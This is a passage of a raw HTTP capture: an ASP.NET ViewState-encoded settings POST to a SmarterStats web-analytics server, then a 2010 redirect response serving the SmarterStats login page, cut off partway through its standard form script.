TUDMTIwAzE1NQMxNDUDMTUwAzE1OAstMjE0NzQ4MzU3NwMxNjADMTY1AzE3MAstMjE0NzQ4MzU4NAstMjE0NzQ4MzU3NAMxNzUDMTgwAzE4NQMyMDADMTkwAzE5MwMyMDEDMTk1AzIwMwMyMDcDMjA1AzIyNQMyMTADMjI3AzIyMAMyMTUDMjQwAzIzMAMyMzUDMjUwAzI0NQMyNzUDMjU1AzI3MAMyNjADMjY1AzI4MAMyODUDMjkwAzMwMBQrA1dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAICDw8WAh8EBSYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYgQ2FuYWRhKWRkAgcPZBYCAgEPZBYCZg8QZBAVAghOZXcgVXNlcgdob3l0bmV0FQIAB2hveXRuZXQUKwMCZ2cWAQIBZAIDDw8WAh8CaGQWBGYPZBYCAgEPZBYEZg8PFgIfBGVkZAICDw8WAh8EZWRkAgEPZBYCAgEPZBYCAgIPDxYCHwRlZGQCBQ9kFgJmD2QWAgIBD2QWAmYPEA8WAh4HQ2hlY2tlZGdkZGRkAgQPZBYCAgEPZBYOZg9kFgICAQ9kFgRmDxBkEBUCFkxvY2FsIFBhdGggb3IgVU5DIFBhdGgDRlRQFQIFTG9jYWwDRlRQFCsDAmdnFgFmZAICDw8WAh8EBRZMb2NhbCBQYXRoIG9yIFVOQyBQYXRoZGQCAQ9kFgICAQ9kFgJmDxBkEBUHFklJUyAtIFczQ2V4IExvZyBGb3JtYXQeSUlTIC0gTWljcm9zb2Z0IElJUyBMb2cgRm9ybWF0HElJUyAtIE5DU0EgQ29tbW9uIExvZyBGb3JtYXQaQXBhY2hlIC0gQ29tbW9uIExvZyBGb3JtYXQhQXBhY2hlIC0gTkNTQSBFeHRlbmRlZCBMb2cgRm9ybWF0G0lQbGFuZXQgLSBDb21tb24gTG9nIEZvcm1hdBlPdGhlciAtIENvbW1vbiBMb2cgRm9ybWF0FQcFVzNDZXgDSUlTBE5DU0EJQXBhY2hlQ0xGDEFwYWNoZU5DU0FFeApJUGxhbmV0Q0xGA0NMRhQrAwdnZ2dnZ2dnZGQCAg9kFgICAQ9kFgJmDxBkEBUlDE5ldmVyIERlbGV0ZRVEZWxldGUgYWZ0ZXIgMSBtb250aHMVRGVsZXRlIGFmdGVyIDIgbW9udGhzFURlbGV0ZSBhZnRlciAzIG1vbnRocxVEZWxldGUgYWZ0ZXIgNCBtb250aHMVRGVsZXRlIGFmdGVyIDUgbW9udGhzFURlbGV0ZSBhZnRlciA2IG1vbnRocxVEZWxldGUgYWZ0ZXIgNyBtb250aHMVRGVsZXRlIGFmdGVyIDggbW9udGhzFURlbGV0ZSBhZnRlciA5IG1vbnRocxZEZWxldGUgYWZ0ZXIgMTAgbW9udGhzFkRlbGV0ZSBhZnRlciAxMSBtb250aHMWRGVsZXRlIGFmdGVyIDEyIG1vbnRocxZEZWxldGUgYWZ0ZXIgMTMgbW9udGhzFkRlbGV0ZSBhZnRlciAxNCBtb250aHMWRGVsZXRlIGFmdGVyIDE1IG1vbnRocxZEZWxldGUgYWZ0ZXIgMTYgbW9udGhzFkRlbGV0ZSBhZnRlciAxNyBtb250aHMWRGVsZXRlIGFmdGVyIDE4IG1vbnRocxZEZWxldGUgYWZ0ZXIgMTkgbW9udGhzFkRlbGV0ZSBhZnRlciAyMCBtb250aHMWRGVsZXRlIGFmdGVyIDIxIG1vbnRocxZEZWxldGUgYWZ0ZXIgMjIgbW9udGhzFkRlbGV0ZSBhZnRlciAyMyBtb250aHMWRGVsZXRlIGFmdGVyIDI0IG1vbnRocxZEZWxldGUgYWZ0ZXIgMjUgbW9udGhzFkRlbGV0ZSBhZ
nRlciAyNiBtb250aHMWRGVsZXRlIGFmdGVyIDI3IG1vbnRocxZEZWxldGUgYWZ0ZXIgMjggbW9udGhzFkRlbGV0ZSBhZnRlciAyOSBtb250aHMWRGVsZXRlIGFmdGVyIDMwIG1vbnRocxZEZWxldGUgYWZ0ZXIgMzEgbW9udGhzFkRlbGV0ZSBhZnRlciAzMiBtb250aHMWRGVsZXRlIGFmdGVyIDMzIG1vbnRocxZEZWxldGUgYWZ0ZXIgMzQgbW9udGhzFkRlbGV0ZSBhZnRlciAzNSBtb250aHMWRGVsZXRlIGFmdGVyIDM2IG1vbnRocxUlATABMQEyATMBNAE1ATYBNwE4ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMTkCMjACMjECMjICMjMCMjQCMjUCMjYCMjcCMjgCMjkCMzACMzECMzICMzMCMzQCMzUCMzYUKwMlZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAgMPZBYEZg8PFgYfBgUMSW5kZW50IEZpeGVkHwQFEEV4cG9ydCBEaXJlY3RvcnkfBwICZGQCAQ8PFgQfBgUIIFNldHRpbmcfBwICZGQCBA9kFgICAQ9kFgICAg8PFgIfBGVkZAIFD2QWAgIBD2QWAmYPEA8WAh8EBUFFbmFibGUgcmVtb3ZhbCBvZiBVUkwgaXRlbXMgYWZ0ZXIgc2VtaWNvbG9uICh1c2VkIGZvciBqc2Vzc2lvbmlkKWRkZGQCBg9kFgJmDw8WBB8GBQ5JbmRlbnQgU2V0dGluZx8HAgJkFgICAw8PFgIfBAUwaW5kZXguaHRtDQppbmRleC5odG1sDQpkZWZhdWx0LmFzcA0KZGVmYXVsdC5hc3B4ZGQCCA9kFgICAQ8WAh8CaBYCAgEPZBYGZg9kFgRmDw8WBh8GBQxJbmRlbnQgRml4ZWQfBAUGU2VydmVyHwcCAmRkAgEPDxYEHwYFCCBTZXR0aW5nHwcCAmQWAgIBDw8WAh8EBQdUZXN0Li4uZGQCBA9kFgRmDw8WBh8GBQxJbmRlbnQgRml4ZWQfBAUJRGlyZWN0b3J5HwcCAmRkAgEPDxYEHwYFCCBTZXR0aW5nHwcCAmRkAgYPZBYCAgEPZBYCZg8QZBAVCwpFdmVyeSBob3VyDUV2ZXJ5IDIgaG91cnMNRXZlcnkgMyBob3Vycw1FdmVyeSA0IGhvdXJzDUV2ZXJ5IDUgaG91cnMNRXZlcnkgNiBob3Vycw5FdmVyeSAxMiBob3VycwlFdmVyeSBkYXkMRXZlcnkgMiBkYXlzDEV2ZXJ5IDMgZGF5cwpFdmVyeSB3ZWVrFQsBMQEyATMBNAE1ATYCMTICMjQCNDgCNzIDMTY4FCsDC2dnZ2dnZ2dnZ2dnFgFmZAIKD2QWBAIBD2QWAmYPZBYGZg9kFgICAQ9kFgICAg8PFgIfBAUBNWRkAgEPZBYCAgEPZBYCAgIPDxYCHwQFATVkZAICD2QWAgIBD2QWAgICDw8WAh8EBQMxMDBkZAIDD2QWAmYPZBYCZg9kFgICAQ9kFgJmDxAPFgoeDURhdGFUZXh0RmllbGQFBG5hbWUeDkRhdGFWYWx1ZUZpZWxkBQJpZB4LXyFEYXRhQm91bmRnHwYFDENoZWNrYm94TGlzdB8HAgJkEBUWBkdvb2dsZQVZYWhvbwNBc2sEQmluZwtHb29nbGUgKEFVKQtHb29nbGUgKEJSKQtHb29nbGUgKENBKQtHb29nbGUgKENOKQtHb29nbGUgKERFKQtHb29nbGUgKEVTKQtHb29nbGUgKEZSKQtHb29nbGUgKEhLKQtHb29nbGUgKElOKQtHb29nbGUgKElMKQtHb29nbGUgKElUKQtHb29nbGUgKEpQKQtHb29nbGUgKEtSKQtHb29nbGUgKE1YKQtHb29nbGUgKE5MKQtHb29nbGUgKFRXKQtHb29nbGUgKFJVKQtHb29nbGUgK
FVLKRUWATEBMgE0ATUBNwE4ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMTkCMjACMjECMjICMjQCMjMUKwMWZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkGA0FEmN0bDAwJE5hdlBIJHBnckxvZw8FImN0bDAwX01QSF9ncmRMb2dTdGF0dXN8MTZ8MHw5fDI1fDBkBRZjdGwwMCRNUEgkZ3JkTG9nU3RhdHVzDwU1VHJ1ZXxUcnVlfHxUcnVlfFRydWV8TGFzdFRpbWVTdGFtcCBkZXNjfEZhbHNlfEZhbHNlfDBkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMQ8y1gsAAQAAAP%2f%2f%2f%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%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAACEBPcHRpb25zAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtkBRljdGwwMCRNUEgkZ3JkTG9nTG9jYXRpb25zDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTgPMtoLAAEAAAD%2f%2f%2f%2f%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%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAApAU0VPU3RhdHVzAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAMU0VPU3RhdHVzVGFiC2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW01DzLcCwABAAAA%2f%2f%2f%2f%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%2bQBU3
lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2f%2f%2f%2fkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2f%2f%2f%2f8%2f%2f%2f%2fBgcAAAAEVGV4dAoB%2bP%2f%2f%2f%2fz%2f%2f%2f8GCQAAAApSZXNvdXJjZUlEBgoAAAALQFNlb09wdGlvbnMB9f%2f%2f%2f%2fz%2f%2f%2f8GDAAAAAhTZWxlY3RlZAgBAAHz%2f%2f%2f%2f%2fP%2f%2f%2fwYOAAAAClBhZ2VWaWV3SUQGDwAAAA1TZW9PcHRpb25zVGFiC2QFFmN0bDAwJE1QSCRncmRTZW9TdGF0dXMPBTpUcnVlfFRydWV8fFRydWV8VHJ1ZXxsYXN0UHJvY2Vzc2luZ0RhdGUgZGVzY3xGYWxzZXxGYWxzZXwwZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTcPMtoLAAEAAAD%2f%2f%2f%2f%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%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAApATG9nU3RhdHVzAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAMTG9nU3RhdHVzVGFiC2QFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYZBSRjdGwwMCRNUEgkY2hrU2VvRW5hYmxlZF9TZXR0aW5nQ2hlY2sFKGN0bDAwJE1QSCRjaGtTdHJpcEFmdGVyU2VtaV9TZXR0aW5nQ2hlY2sFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY
2tCb3gkMAVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMwVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ0BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDUFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNgVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ3BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDgFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkOQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMgVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMwVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNgVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNwVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxOAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxOQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMAVJY
3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMQUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTQPMtQLAAEAAAD%2f%2f%2f%2f%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%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAdATG9nRlRQAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAJTG9nRlRQVGFiC2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0zDzLgCwABAAAA%2f%2f%2f%2f%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%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2f%2f%2f%2fkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2f%2f%2f%2f8%2f%2f%2f%2fBgcAAAAEVGV4dAoB%2bP%2f%2f%2f%2fz%2f%2f%2f8GCQAAAApSZXNvdXJjZUlEBgoAAAANQExvZ0xvY2F0aW9ucwH1%2f%2f%2f%2f%2fP%2f%2f%2fwYMAAAACFNlbGVjdGVkCAEAAfP%2f%2f%2f%2f8%2f%2f%2f%2fBg4AAAAKUGFnZVZpZXdJRAYPAAAAD0xvZ0xvY2F0aW9uc1RhYgtkBRljdGwwMCRNUEgkUGFnZUl
kZW50aWZpZXIxDwUgNGZlNTRjNDQyMWIwNGU1YTk3NWFhNjliOWNjY2M4MTBkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMg8y3AsAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQ
KAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BMb2dPcHRpb25zAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAANTG9nT3B0aW9uc1RhYgtkO%2bUDWAPhQZDBIN%2fz%2f3gfFlozCpGuJtURlykZelxfX%2f4%3d&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24lstLogLocation_SettingDropDown=FTP

Response (redirected)

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 23:47:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8607
Connection: Close



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SmarterStats Login - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type="text/javascript">
       if (parent.isRoot != null)
           parent.location.href = location.href;
       if (parent.parent.isRoot != null)
           parent.parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Login" dir="ltr">
   <form name="aspnetForm" method="post" action="login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
